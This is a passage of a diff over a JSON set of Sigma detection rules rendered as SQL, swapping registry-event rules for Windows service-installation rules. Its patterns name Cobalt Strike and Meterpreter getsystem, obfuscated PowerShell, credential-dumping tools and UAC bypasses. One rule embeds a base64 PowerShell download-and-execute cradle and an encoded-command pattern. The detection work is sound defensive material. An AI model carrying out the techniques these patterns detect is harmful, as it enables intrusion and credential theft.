'%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml" + }, + { + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "falsepositives": [ + "Legitimate use of the tool" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Windows Defender Threat Detection Disabled - Service", + "id": "6c0a7755-6d31-44fa-80e1-133e57752680", + "status": "stable", + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions", + "Auto updates of Windows Defender causes restarts" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_defender_disabled.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "PsExec Service Installation", + "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "status": "experimental", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_psexec.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", - "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "status": "test", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": 